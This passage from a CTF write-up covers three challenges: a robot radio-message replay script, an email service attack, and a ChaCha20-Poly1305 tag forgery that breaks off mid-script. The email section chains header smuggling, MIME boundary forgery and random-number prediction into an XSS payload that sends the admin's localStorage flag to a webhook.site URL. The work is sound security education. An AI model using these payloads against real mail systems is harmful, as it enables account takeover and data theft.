receive_radio_messages()[-1] # sleep(.5) log.info("should be done") robot_nonce = 14 controller_nonce = 14 for i in high: if i['msg_type'] == 'secure_data': i['dst'] = '0' secure_data[robot_nonce] = i robot_nonce += 1 if i['msg_type'] == 'secure_data_response': secure_data_response[controller_nonce] = i controller_nonce += 1 if i['msg_type'] == 'secure_data_ack': secure_data_ack[controller_nonce] = i controller_nonce += 1 if i['msg_type'] == 'secure_data_request': i['dst'] = '0' secure_data_request[robot_nonce] = i robot_nonce += 1 log.info(f"done assigning high nonces") start_robot() wait_for_radio_message("debug") inject_radio_message({"msg_type": "set_addr", "dst": "16", "src":"1", "new_addr": "0"}) a = wait_for_radio_message("secure_data")[-1] log.info(f"got a = {a.get(ENC)[:16]}") inject_radio_message(secure_data_ack[2], dst=BOT) """ THING """ wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[3], dst=BOT, msg_type="secure_data_response") # now we're at nonce 4 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[4], dst=BOT) # now we're at nonce 5 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[5], dst=BOT, msg_type="secure_data_response") # now we're at nonce 6 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[6], dst=BOT, msg_type="secure_data_response") # now we're at nonce 7 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[7], dst=BOT, msg_type="secure_data_response") # now we're at nonce 8 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[8], dst=BOT, msg_type="secure_data_response") # now we're at nonce 9 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[9], dst=BOT) # now we're at nonce 10 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[10], dst=BOT) # now we're at nonce 11 
wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[11], dst=BOT, msg_type="secure_data_response") # now we're at nonce 12 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[12], dst=BOT, msg_type="secure_data_response") # now we're at nonce 13 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[13], dst=BOT, msg_type="secure_data_response") # now we're at nonce 14 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[14], dst=BOT, msg_type="secure_data_response") # now we're at nonce 15 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[15], dst=BOT) # now we're at nonce 16 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[16], dst=BOT) # now we're at nonce 17 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[17], dst=BOT, msg_type="secure_data_response") # now we're at nonce 18 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[18], dst=BOT, msg_type="secure_data_response") # now we're at nonce 19 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[19], dst=BOT, msg_type="secure_data_response") # now we're at nonce 20 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[20], dst=BOT, msg_type="secure_data_response") # now we're at nonce 21 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[21], dst=BOT) # now we're at nonce 22 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[22], dst=BOT) # now we're at nonce 23 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[23], dst=BOT, msg_type="secure_data_response") # now we're at nonce 24 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[24], dst=BOT, 
msg_type="secure_data_response") # now we're at nonce 25 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[25], dst=BOT, msg_type="secure_data_response") # now we're at nonce 26 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[26], dst=BOT, msg_type="secure_data_response") # now we're at nonce 27 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[27], dst=BOT) # now we're at nonce 28 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[28], dst=BOT) # now we're at nonce 29 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[29], dst=BOT, msg_type="secure_data_response") # now we're at nonce 30 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[30], dst=BOT, msg_type="secure_data_response") # now we're at nonce 31 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[31], dst=BOT, msg_type="secure_data_response") # now we're at nonce 32 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[32], dst=BOT, msg_type="secure_data_response") # now we're at nonce 33 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[33], dst=BOT) # now we're at nonce 34 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[34], dst=BOT) # now we're at nonce 35 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[35], dst=BOT, msg_type="secure_data_response") # now we're at nonce 36 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[36], dst=BOT, msg_type="secure_data_response") # now we're at nonce 37 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[37], dst=BOT, msg_type="secure_data_response") # now we're at nonce 38 wait_for_radio_message("secure_data_request") 
inject_radio_message(secure_data_ack[38], dst=BOT, msg_type="secure_data_response")  # now we're at nonce 39
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[39], dst=BOT)  # now we're at nonce 40
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[40], dst=BOT)  # now we're at nonce 41
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[41], dst=BOT)  # now we're at nonce 42
wait_for_radio_message("secure_data")
inject_radio_message(secure_data_ack[42], dst=BOT)  # now we're at nonce 43
wait_for_radio_message("secure_data_request")
inject_radio_message(secure_data_response[43], dst=BOT)
quit("done")
```

## Secure Email Service

### surveying the challenge

The first thing I (voxal) looked at was how to obtain the flag. The goal was to get the admin to open a signed message with an XSS payload in it.

`email.html`
```js=
if (parsed.html) {
  const signed = await getSigned(msg.data, await rootCert());
  if (signed) {
    const { html } = await parse(signed);
    const shadow = content.attachShadow({ mode: 'closed' });
    shadow.innerHTML = `<style>:host { all: initial }</style>${html}`;
  } else {
    content.style.color = 'red';
    content.innerText = 'invalid signature!';
  }
} else {
  const pre = document.createElement('pre');
  pre.style.overflow = 'auto';
  pre.innerText = parsed.text;
  content.appendChild(pre);
}
```

If the email both had HTML and was signed, the page would embed the HTML, giving us XSS.

The first thing we decided to look at was the WASM binaries, because another challenge (pachinko revisited) involved reverse engineering a WASM binary. We quickly realized that 1) the OpenSSL binary was basically just the CLI tool, so that wasn't vulnerable, and 2) the parser was based on a Rust crate called [mail-parser](https://lib.rs/crates/mail-parser) (found by running `strings` on the binary).
We then looked at whether it was possible to somehow forge the signature, or to solve the challenge some other way through cryptography. We quickly abandoned this, both because it would involve finding a vulnerability in `openssl` and because, being quite familiar with the authors' challenges, I doubted that they would make this a crypto challenge.

I had a revelation when looking at the javascript of `reply.html`:

```js=
import { email, requireLogin, send } from './src/api.js'
import { parse } from './src/email.js'

await requireLogin();

const id = new URL(window.location.href).searchParams.get('id');
if (!/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/.test(id)) {
  alert('invalid id');
  location.href = '/inbox.html';
}

const parsed = await parse((await email(id)).data);
const subject = `Re: ${parsed.subject}`;
document.getElementById('subject').innerText = subject;

document.getElementById('reply').onsubmit = async e => {
  e.preventDefault();
  const body = document.querySelector('[name=body]').value;
  try {
    await send(parsed.from, subject, body); // this line
  } catch(e) {
    alert(e);
    return;
  }
  alert('sent!');
  location.href = '/inbox.html';
}
```

What I realized was that the reply is sent to the `parsed.from` of the parsed email. If we somehow managed to modify that header, we would be able to force the admin bot to send a signed email to itself. Since signed messages get embedded, controlling the body of that email would give us XSS.

In order to control the body, we needed to first predict the boundary that python generates in the multipart message, so I set my teammates HELLOPERSON and smashmaster to work on cracking python's random to predict the boundary.

![predict boundary write your email to fake a "from" header to be admin@ses. change the subject header and next predicted boundary to inject xss payload into the reply email ask the admin bot to reply to that email, sending xss to itself proc admin bot again ](https://hackmd.io/_uploads/rkMiDZG2kl.png)

### smuggling the header

Since this was our attack vector, we started to look at the email generation code.

```py=
def generate_email(
    sender: str,
    recipient: str,
    subject: str,
    content: str,
    html: bool = False,
    sign: bool = False,
    cert: str = '',
    key: str = '',
) -> str:
    msg = MIMEMultipart()
    msg['From'] = sender
    msg['To'] = recipient
    msg['Subject'] = subject
    msg.attach(MIMEText(content))
    if html:
        msg.attach(MIMEText(content, 'html'))
    if sign:
        return smail.sign_message(msg, key.encode(), cert.encode()).as_string()
    return msg.as_string()
```

We copied the logic into a solve script file and tried spoofing a `From` header in the `Subject` field:

```py=
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = """ABC
From: admin@ses
"""
msg.attach(MIMEText("text"))
print(msg.as_string())
```

Run:

```
Traceback (most recent call last):
  File "/home/voxal/code/ctf/pico-2025/secure-email-service/tester.py", line 13, in <module>
    print(msg.as_string())
          ~~~~~~~~~~~~~^^
  ...
  File "/usr/lib/python3.13/email/header.py", line 385, in encode
    raise HeaderParseError("header value appears to contain "
        "an embedded header: {!r}".format(value))
email.errors.HeaderParseError: header value appears to contain an embedded header: 'ABC\nFrom: admin@ses'
```

Hmm nope, looks like there's some logic checking for the exact thing I'm doing. Although the `README` of `mail-parser` does say

> In general, this library abides by the Postel's law or Robustness Principle which states that an implementation must be conservative in its sending behavior and liberal in its receiving behavior. This means that mail-parser will make a best effort to parse non-conformant e-mail messages as long as these do not deviate too much from the standard.

so we could try some variations of the header and see if the parser is lenient enough to parse the extra `From` header. Maybe a space after the header name?

```py=
msg['Subject'] = f"""ABC
From : admin@ses
"""
```

gives:

```
email.errors.HeaderWriteError: folded header contains newline: 'Subject: ABC\nFrom : admin@ses\n'
```

Different error, still doesn't work. Maybe a space before the header?

```py=
msg['Subject'] = f"""ABC
 From: admin@ses
"""
```

gives:

```
Content-Type: multipart/mixed; boundary="fixed"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: ABC
 From: admin@ses

--fixed
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

text
--fixed--
```

Hey! It produced an email, let's try parsing it. We can write this to `email.eml` and use wasmtime to run the parser (this is the same way the javascript does it).

```bash
❯ wasmtime --dir . frontend/public/wasm/parser.wasm
{
  "from": "user@ses",
  "html": null,
  "subject": "ABC From: admin@ses",
  "text": "text",
  "to": "admin@ses"
}
```

Nope, the from field is still `"user@ses"`, and instead the header got put in the `subject`.

We tried more things, but none of them seemed to work. We were stuck until a teammate reminded me that I was on Python 3.13 while the challenge was running Python 3.11. I tried a space after the header name again (because we had tested it, and the parser would accept it) and well...

```py=
msg['Subject'] = f"""ABC
From : admin@ses
"""
```

gives:

```
Content-Type: multipart/mixed; boundary="fixed"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: ABC
From : admin@ses

--fixed
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

text
--fixed--
```

Haha.. It worked! And the parser parses it like a new header as well!

```bash
❯ wasmtime --dir . frontend/public/wasm/parser.wasm
{
  "from": "admin@ses",
  "html": null,
  "subject": "ABC",
  "text": "text",
  "to": "admin@ses"
}
```

### controlling the body

Next we needed a way to control the body of the reply email somehow. Again, the only field we had control over was the subject. So it should just be as easy as adding a `\n\n` to the `Subject` header to get control of the body, right?

```py=
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = """ABC
From : admin@ses

--fixed

xss payload goes here
"""
msg.attach(MIMEText("text"))
print(msg.as_string())
```

gives:

```
Content-Type: multipart/mixed; boundary="fixed"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: ABC
From : admin@ses
--fixed
xss payload goes here

--fixed
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

text
--fixed--
```

At this point I was confusing myself between the initial and reply email, so even if this worked, the reply wouldn't be hijacked (I lose track of these things pretty easily). Regardless, it looks like python strips this as well. What a shame. Well, let's find a way to bypass this.

We found this [github issue](https://github.com/python/cpython/issues/121650) that seemed to be exactly what we needed. By using MIME encoding, hopefully we could smuggle 2 newlines into the reply email.

```py=
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = """ABC =?UTF-8?Q?=0A?=--replybound =?UTF-8?Q?=0A?=xss payload goes here
From : admin@ses
"""

eml = open("email.eml", "w")
eml.write(msg.as_string())
eml.close()

sub = subprocess.run("wasmtime --dir . frontend/public/wasm/parser.wasm", shell=True, encoding="UTF-8", capture_output=True)
print(sub.stdout)
print(sub.stderr)
obj = json.loads(sub.stdout)

print("vvvvvvvv REPLY BELOW vvvvvvvv")
print()

rep = MIMEMultipart(boundary="replybound")
rep['From'] = "user@ses"
rep['To'] = obj["from"]
rep['Subject'] = f"Re: {obj['subject']}"
print(rep.as_string())
```

Oh yeah, we updated our script to also print the reply email, so we could confirm whether we were able to hijack its body. Either way, running this gave us:

```
^^^ initial email cut for brevity
---
{
  "from": "admin@ses",
  "html": null,
  "subject": "ABC \n --replybound \n xss payload goes here",
  "text": "text",
  "to": "admin@ses"
}

vvvvvvvv REPLY BELOW vvvvvvvv

Content-Type: multipart/mixed; boundary="replybound"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: Re: ABC
 --replybound
 xss payload goes here

--replybound

--replybound--
```

Yeah, I should have expected this. We did manage to smuggle newlines into the reply email though! (A side note: if you look at the `\n` in the parsed message, you'll see that there are spaces on both sides of it. This annoyed us, since we couldn't control reply headers until we figured this out. We realized we could just encode the entire message.)

Anyways, we spent quite a while banging our heads trying to figure out how to get 2 newlines without python stripping them out. We gave up on this approach after looking at the source code:

```py=
for line in lines[1:]:
    formatter.newline()
    if charset.header_encoding is not None:
        formatter.feed(self._continuation_ws, ' ' + line.lstrip(),
                       charset)
    else:
        sline = line.lstrip()
        fws = line[:len(line)-len(sline)]
        formatter.feed(fws, sline, charset)
if len(lines) > 1:
    formatter.newline()
```

This code ensures that there is text in the line before adding **a single new line** (`formatter.newline()`), so there would be no way of smuggling our way into the body.
### a new way forward

I did a second pass of the source code and realized something very suspicious.

```py=
@app.post('/api/send')
async def send(
    user: Annotated[User, Depends(db.request_user)],
    to: Annotated[str, Body()],
    subject: Annotated[str, Body()],
    body: Annotated[str, Body()]
):
    # make sure the email we're sending to is valid
    recipient = await db.get_user(to)

    if len(user.public_key) == 0:
        msg = util.generate_email(
            sender=user.username,
            recipient=recipient.username,
            subject=subject,
            content=body,
        )
    else:
        msg = util.generate_email(
            sender=user.username,
            recipient=recipient.username,
            subject=subject,
            # vvvvvvv
            content=template.render(
                title=subject,
                content=body
            ),
            # ^^^^^^^
            html=True,
            sign=True,
            cert=user.public_key,
            key=user.private_key
        )

    email_id = str(uuid.uuid4())
    await db.send_email(recipient, email_id, msg)
    return email_id
```

An email sent by a user with a public key (like the admin) goes through the jinja template! This would give us access to the body of the reply. Removing all the styles and other misc crap in the template, we're left with

```html=
<!DOCTYPE html>
<html>
<body>
    <div class="email-container">
        <h1>{{ title }}</h1>
        <pre>{{ content }}</pre>
    </div>
</body>
</html>
```

We have control over the title! We can't just toss an XSS payload at this thing, since the `{{ }}` output is autoescaped, so we'll need to be more creative.

The idea that formed was to put an encoded chunk in our subject. When the subject is decoded in the reply and rendered into the template, the parser is tricked into treating that part of the template as a new multipart chunk, and so it parses our chunk as the body of the email.
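As a small illustration of the "encoded chunk" idea, the sketch below wraps text containing newlines in a base64 RFC 2047 encoded-word and decodes it again. The `encode` helper mirrors the one in the script that follows; the `chunk` value is made up, and Python's `email.header.decode_header` is only standing in for the challenge's `mail-parser`, whose decoding is not exercised here.

```python
import base64
from email.header import decode_header


def encode(text: str) -> str:
    """Wrap text in a base64 RFC 2047 encoded-word."""
    return f"=?UTF-8?B?{base64.b64encode(text.encode()).decode()}?="


# hypothetical chunk with the newlines we would like to smuggle
chunk = "\n--replybound\nContent-Type : text/html\n\n"
word = encode(chunk)

# the encoded-word is a single line of printable ASCII, so the header
# generator never sees a raw newline
assert "\n" not in word

# decoding restores the raw bytes, newlines included
decoded = b"".join(part for part, _charset in decode_header(word))
print(repr(decoded.decode()))
```

The point is only that the newlines exist after decoding, not before, which is why they survive the sending side's header checks.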
```py=
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import os
import subprocess
import json
import base64
from jinja2 import Template

template = Template(open('./template.jinja2', 'r').read(), autoescape=True)

def encode(text):
    return f"=?UTF-8?B?{base64.b64encode(text.encode()).decode()}?="

content_type = '\nContent-Type : multipart/mixed; boundary="replybound"'
replybound = ''
# the base64 encoded thingy is our payload, we separate it out for
# our final solve script
payload = '\nSubject : \n--replybound\nContent-Type : text/html\nContent-Transfer-Encoding : base64\n\nPHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+\n--replybound\n'

lb = "\n"

msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)}
From : admin@ses
"""

print("vvvv FINAL OUTPUT BELOW")
print(f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)}
From : admin@ses
""")
print("^^^^ FINAL OUTPUT ABOVE")

msg.attach(MIMEText("text"))

print(msg.as_string())

eml = open("email.eml", "w")
eml.write(msg.as_string())
eml.close()

sub = subprocess.run("wasmtime --dir . frontend/public/wasm/parser.wasm", shell=True, encoding="UTF-8", capture_output=True)
print(sub.stdout)
print(sub.stderr)
obj = json.loads(sub.stdout)

print("vvvvvvv SUBJECT BELOW vvvvvv")
print(obj['subject'])
print("vvvvvvvv REPLY BELOW vvvvvvvv")
print()

rep = MIMEMultipart(boundary="replybound")
rep['From'] = "admin@ses"
rep['To'] = obj["from"]
rep['Subject'] = f"Re: {obj['subject']}"

admin_content = '\n\n'.join([
    'We\'ve gotten your message and will respond soon.',
    'Thank you for choosing SES!',
    'Best regards,',
    'The Secure Email Service Team'
])

admin_rendered = template.render(
    title=obj['subject'],
    content=admin_content
)

rep.attach(MIMEText(admin_rendered))
# rep.attach(MIMEText(admin_rendered, 'html'))
print(rep.as_string())
```

Here's what the reply looks like:

```
Content-Type: multipart/mixed; boundary="replybound"
MIME-Version: 1.0
From: admin@ses
To: admin@ses
Subject: Re: ABC
Subject : 
--replybound
Content-Type : text/html
Content-Transfer-Encoding : base64
PHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+
--replybound
Content-Type : multipart/mixed; boundary="replybound"

--replybound
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

<!DOCTYPE html>
<html>
<body>
    <div class="email-container">
        <h1>ABC
Subject : 
--replybound
Content-Type : text/html
Content-Transfer-Encoding : base64

PHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+
--replybound

Content-Type : multipart/mixed; boundary=&#34;replybound&#34;</h1>
        <pre>We&#39;ve gotten your message and will respond soon.

Thank you for choosing SES!

Best regards,

The Secure Email Service Team</pre>
    </div>
</body>
</html>
--replybound--
```

And let's take the reply email and put it into the parser...

```bash
❯ wasmtime --dir . frontend/public/wasm/parser.wasm
{
  "from": "admin@ses",
  "html": "<script>fetch(\"//webhook.site/1a0df526-09ef-454a-9d53-ceb99e0e1c2f/?\" + localStorage.flag)</script>",
  "subject": null,
  "text": "<!DOCTYPE html>\n<html>\n<body>\n <div class=\"email-container\">\n <h1>ABC\nSubject :",
  "to": "admin@ses"
}
```

Hey would you look at that! We got it!

### we did, in fact, not get it.

After testing this against a local instance, well, let's just say we forgot that the email was signed. The concept still had merit though; we just needed to adapt it to the format of the signed email. Since any headers we injected were put at the top level of the signed email, we could no longer control the `Content-Type` of the inner email, and thus couldn't change the boundary to what we needed it to be. This meant that we needed to predict the boundary, which was possible through randcracking. My teammates unvariant and HELLOPERSON wrote the randcracker for me.

Looking at the [cpython source](https://github.com/python/cpython/blob/72e5b25efb580fb1f0fdfade516be90d90822164/Lib/email/generator.py#L387), we can see that the boundary is generated using `random.randrange(sys.maxsize)`. Since `sys.maxsize` is 2^63-1, this should reliably generate 63 'clean' bits from the MT19937 PRNG. Since each block from MT19937 is supposed to be 32 bits, this means we are uncertain about one bit from each set of 2 consecutive blocks, which means we should use a symbolic mersenne twister cracker (which likely uses z3). Searching around for one, we can find [this](https://github.com/icemonster/symbolic_mersenne_cracker/blob/main/main.py) implementation, which is perfect for our purposes.

To predict the boundary, we first need to collect a sufficient number of samples to recover the MT19937 state. In theory, this can be done using 624 32-bit outputs, but to be safe, we collected over 1,000 63-bit outputs.
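To make the "one uncertain bit per pair of blocks" remark concrete, here is a minimal sketch of how a 63-bit token relates to two consecutive 32-bit MT19937 outputs in CPython, and how a token becomes a boundary string. The seed `2025` and the `make_boundary` helper are made up for illustration; the `%019d` width is my reading of CPython's `email.generator` (the digit count of `sys.maxsize - 1`), so treat it as an assumption.

```python
import random

MAXSIZE = 2**63 - 1  # sys.maxsize on 64-bit CPython


def make_boundary(token: int) -> str:
    """Format a token as 15 '=' signs, a zero-padded 19-digit number, then '=='."""
    return "=" * 15 + "%019d" % token + "=="


# two generators with the same (arbitrary) seed emit the same 32-bit words
words = random.Random(2025)
tokens = random.Random(2025)

lo = words.getrandbits(32)  # first MT19937 output: the low 32 bits of the token
hi = words.getrandbits(32)  # second output: only its top 31 bits are used
token = tokens.randrange(MAXSIZE)

# the lowest bit of `hi` is discarded, which is the bit a cracker cannot observe
assert token == ((hi >> 1) << 32) | lo
print(make_boundary(token))
```

Each observed boundary therefore exposes 63 of the 64 bits that the generator produced, which is why a symbolic cracker that tolerates unknown bits is a good fit.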
Feeding these inputs into the randcracker in the right format (*cough cough `bin` doesn't pad*), we can predict the next outputs of `random.randrange(sys.maxsize)` and thus predict the boundary!

Alright, now that we were able to predict the boundary, we were ready to rip the exploit. Our final payload was as follows:

```py=
def encode(text):
    return f"=?UTF-8?B?{base64.b64encode(text.encode()).decode()}?="

boundary = "===============7570496185067173140=="
js_payload = '<img src=x onerror=fetch("https://webhook.site/1a0df526-09ef-454a-9d53-ceb99e0e1c2f/?"+localStorage.flag,{mode:"no-cors"}) />'
encoded_js_payload = base64.b64encode(js_payload.encode()).decode()
content_type = '\nContent-Type : multipart/mixed; boundary="="'
replybound = ''
payload = f'\nSubject : \n--{boundary}\nContent-Type : text/html\nContent-Transfer-Encoding : base64\n\n{encoded_js_payload}\n--{boundary}\n'
lb = "\n"

msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)}
From : admin@ses
"""
```

We need the extra `Content-Type : multipart/mixed; boundary="="` since the chunk we injected brought along an injected `Content-Type : text/html`, and we need to remedy that. Luckily the mail parser was lenient enough to let this boundary through (it doesn't conform to spec at all lol).

Anyways, now that we had our exploit, we sent it at the server, hoping for a response.

![image](https://hackmd.io/_uploads/r1VW8cz2kl.png)

Any day now..
...
...
Oh what's that?

```py=
@classmethod
def _make_boundary(cls, text=None):
    # Craft a random boundary.  If text is given, ensure that the chosen
    # boundary doesn't appear in the text.
    token = random.randrange(sys.maxsize)
    boundary = ('=' * 15) + (_fmt % token) + '=='
    if text is None:
        return boundary
    b = boundary
    counter = 0
    while True:
        cre = cls._compile_re('^--' + re.escape(b) + '(--)?$', re.MULTILINE)
        if not cre.search(text):
            break
        b = boundary + '.' + str(counter)
        counter += 1
    return b
```

Okay, so it turns out that python still really does not like us, and it tries to prevent us from doing this exact thing by checking the body for the pattern `^--{boundary}(--)?$`. But hey, remember how lenient the parser is?

```py=
boundary = "===============7570496185067173140==a"
```

With the trailing `a`, our injected `--{boundary}a` lines no longer match python's anchored pattern, while the lenient parser apparently still accepts them as boundary lines. So we send it off again, and soon enough we get our flag :D

sorry for this writeup being so long, there are so many different things we tried and i wanted to document them all, i pity whoever needs to read this. (you guys did say step by step right?)

## Cha Cha Slide

Opening the source, we can very quickly ascertain that the goal of this challenge is to forge a ChaCha20-Poly1305 tag, given two known messages tagged with the same nonce. Forging the encrypted message itself given known plaintext and identical keystream is quite trivial, so we will not focus on forging this part of the final message.

Having previously played PlaidCTF 2024, I recalled that there was a very similar challenge, [DHCPPP](https://github.com/sajjadium/ctf-archives/blob/main/ctfs/PlaidCTF/2024/DHCPPP/dhcppp.c31987bce7265cdacd3329769acada11b26f8d57cc6a9676e3a6dda3b5c90200.py), with the same premise of forging a ChaCha20-Poly1305 message. So, I decided to use a few of the easily available solve scripts online ([1](https://sectt.github.io/writeups/Plaid24/DHCPPP/exploit.py), [2](https://hackmd.io/@tranminhprvt01/PlaidCTF2024)) as a starting point for solving the challenge. Since the first one appears to use some specialized technique abusing the fact that the DHCPPP packets were mostly identical, we will be reusing most of the functions/functionality from the second writeup.

Let's try to understand the theory behind the solve. Firstly, we need to understand what, exactly, the data that goes into the Poly1305 authentication is.

![image](https://hackmd.io/_uploads/Sy0gRWGnJe.png)

This diagram on Wikipedia shows it quite well.
There is some "Associated Data" (which is empty for our purposes), which is padded with null bytes to a multiple of 16 bytes. It is followed by the ChaCha20 ciphertext, which is again padded with null bytes to a multiple of 16 bytes, and then by the lengths of the associated data and the ciphertext. The lengths are handled by `struct.pack('<Q', len(data))`, which packs each length into an 8-byte little-endian format. Note that after this process, the total length of the data is a multiple of 16.

After wrangling with the inputs to the Poly1305 hash, it's quite simple to find the secret key `r` given two (input, output) pairs with the same key. At the start of the Poly1305 hash, the input is split into the coefficients of a polynomial. This polynomial is evaluated at `r` modulo 2^130-5, a secret constant `s` derived from the original ChaCha20 keystream is added, and the low 128 bits of the result are used as the hash. To recover `r` from two such (input, output) pairs, we can do the following:

1. Subtract the outputs. This cancels out the secret constant.
2. Brute force the truncated bits. There are only 9 values to test, as the truncation changes the difference by `k`\*2^128 for some integer `k` with -4 ≤ k ≤ 4. Call the real output `c`.
3. Subtract the input polynomials. Call this new polynomial `f`.
4. Find the values where `f(r) = c`. Note that since `r` is restricted in which bits can be 1, we can often identify the only possible candidate for `r`.

Now, we can forge the ciphertext using typical stream cipher techniques, and then use the ciphertext and our recovered (r, s) values to forge a Poly1305 tag. Submitting this to the server (making sure that all our variable names are correct), we receive the flag. Solve script is below.
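Separately from the solve script, steps 1 and 2 can be sanity-checked in plain Python without Sage. The following is a minimal sketch under stated assumptions: `r`, `s`, and the two ciphertexts are made-up values, and `mac_blocks`, `poly_eval`, and `poly1305_tag` are illustrative helper names rather than anything from the challenge source.

```python
import struct

P = 2**130 - 5    # Poly1305 prime
MASK128 = 2**128  # the tag keeps only the low 128 bits


def pad16(data: bytes) -> bytes:
    """Zero padding that brings len(data) up to a multiple of 16."""
    return bytes(-len(data) % 16)


def mac_blocks(ciphertext: bytes, aad: bytes = b"") -> list[int]:
    """Build the AEAD MAC input and split it into Poly1305 coefficients."""
    data = aad + pad16(aad) + ciphertext + pad16(ciphertext)
    data += struct.pack("<Q", len(aad)) + struct.pack("<Q", len(ciphertext))
    # each 16-byte block gets a 0x01 byte appended and is read little-endian
    return [int.from_bytes(data[i:i + 16] + b"\x01", "little")
            for i in range(0, len(data), 16)]


def poly_eval(coeffs: list[int], r: int) -> int:
    """Horner evaluation of the message polynomial at r, modulo P."""
    acc = 0
    for c in coeffs:
        acc = (acc + c) * r % P
    return acc


def poly1305_tag(ciphertext: bytes, r: int, s: int) -> int:
    return (poly_eval(mac_blocks(ciphertext), r) + s) % MASK128


# made-up key material and ciphertexts, purely for illustration
r = 0x0123456789abcdef0123456789abcdef & 0x0ffffffc0ffffffc0ffffffc0fffffff
s = 0xfedcba9876543210fedcba9876543210
ct1 = b"first ciphertext under the nonce"
ct2 = b"second, different ciphertext"

t1, t2 = poly1305_tag(ct1, r, s), poly1305_tag(ct2, r, s)
h_diff = poly_eval(mac_blocks(ct1), r) - poly_eval(mac_blocks(ct2), r)

# s cancels in t1 - t2; only a multiple of 2^128 from the truncation remains
ks = [k for k in range(-4, 5) if (t1 - t2 + k * MASK128 - h_diff) % P == 0]
print(ks)
```

In the real attack `r` is unknown, so instead of checking a known `r` one solves for the roots of the difference polynomial for each candidate `k`, which is what the Sage code in the solve script does.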
```python=
import struct
from pwn import *
from Crypto.Util.number import *
from sage.all import *

context.log_level = 'critical'

P = 2**130 - 5
p = PolynomialRing(GF(2**130-5), 'x')
x = p.gen()

def pad16(data):
    """Return padding for the Associated Authenticated Data"""
    #print(data, type(data))
    if len(data) % 16 == 0:
        return bytes(0)
    else:
        return bytes(16-(len(data)%16))

def get_blocks(c):
    # build the MAC input (empty associated data) and split it into coefficients
    data = b""
    mac_data = c + pad16(c)
    mac_data += struct.pack('<Q', len(data))
    mac_data += struct.pack('<Q', len(c))
    c = mac_data
    real_c = []
    for i in range(0, len(c), 16):
        n = c[i:i+16]
        n = n + b'\x01'
        n += (17-len(n)) * b'\x00'
        assert len(n) == 17
        real_c.append(int.from_bytes(n, byteorder='little'))
    return real_c

def tag(c, r, s):
    mod2 = 2**128
    real_c = get_blocks(c)
    c = real_c
